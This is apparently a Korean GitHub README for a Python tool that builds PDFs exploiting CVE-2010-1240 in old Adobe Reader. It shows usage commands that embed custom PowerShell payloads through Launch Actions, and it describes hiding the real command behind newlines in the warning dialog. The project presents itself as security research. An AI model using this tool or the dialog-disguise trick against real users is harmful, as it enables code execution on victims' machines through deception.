
CVE-2010-1240 연구를 위한 Python 도구 - Adobe Reader Launch Actions를 악용하는 악성 PDF를 생성합니다
CVE-2010-1240 취약점을 악성 PDF 실행 액션을 통해 시연하는 교육용 연구 도구입니다.
이 도구는 교육 목적과 보안 연구를 위해 CVE-2010-1240 취약점을 시연하기 위해 엄격하게 제작되었습니다. PDF 보안 메커니즘과 취약점 연구 학습을 위해 통제된 환경에서만 사용해야 합니다.
악의적인 목적으로 이 도구를 사용하지 마십시오.
이 프로젝트는 악성 PDF 실행 액션을 통해 임의 코드 실행을 허용하는 Adobe Reader의 중요한 취약점인 CVE-2010-1240을 시연합니다. 이 취약점은 Adobe Reader 및 Acrobat 버전 9.3.3 및 8.2.3 이전 버전에 영향을 미칩니다.
git clone https://github.com/12345qwert123456/cve-2010-1240.git
cd cve-2010-1240
# 기본 CVE-2010-1240 시연 PDF 생성
python pdf_generator.py
# 사용자 정의 PowerShell 페이로드로 PDF 생성
python pdf_generator.py -c "Write-Host 'CVE-2010-1240 Demo'; pause"
# 출력 파일명 지정
python pdf_generator.py -o cve_demo.pdf
취약한 Adobe Reader 버전에서 악성 PDF를 열면 실행 액션이 보안 대화상자를 트리거합니다:

실행 액션이 PowerShell을 실행하려고 시도하는 Adobe Reader 보안 경고
보안 대화상자를 우회한 후 CVE-2010-1240 익스플로잇이 PowerShell 페이로드를 성공적으로 실행합니다:

PDF 실행 액션 익스플로잇에 의해 열린 PowerShell 창, 성공적인 코드 실행을 보여줌
고급 공격자는 줄 바꿈과 서식을 사용하여 실제 실행되는 명령을 위장할 수 있습니다:

공격자가 실행 액션 대화상자를 조작하여 악성 명령을 실행하면서 무해한 텍스트를 표시하는 방법 시연
이 기술은 대화상자에 무해한 텍스트를 표시하고 실제 악성 명령은 신중한 서식과 줄 바꿈으로 숨겨 사용자 심리를 이용합니다.
페이로드 예시:
pdf_generator.py -o poc.pdf -c "Write-Host \"'CVE-2010-1240 PoC'; pause\"\n\n\n\n\n\n\n# Press Open Button"
usage: pdf_generator.py [-h] [-o OUTPUT] [-c COMMAND]
CVE-2010-1240 PDF Launch Action Research Tool
options:
-h, --help show this help message and exit
-o OUTPUT, --output OUTPUT
Output PDF filename (default: cve_2010_1240_demo.pdf)
-c COMMAND, --command COMMAND
PowerShell command to execute
CVE-2010-1240은 PDF 문서에서 실행 액션을 부적절하게 처리하여 Adobe Reader 및 Acrobat에 영향을 미치는 치명적인 취약점입니다. 이 취약점은 원격 공격자가 실행 액션 메커니즘을 악용하는 악성 PDF 파일을 제작하여 임의 코드를 실행할 수 있게 합니다.
생성된 PDF는 다음을 통해 CVE-2010-1240을 악용합니다:
❌ 취약한 버전:
✅ 패치된 버전: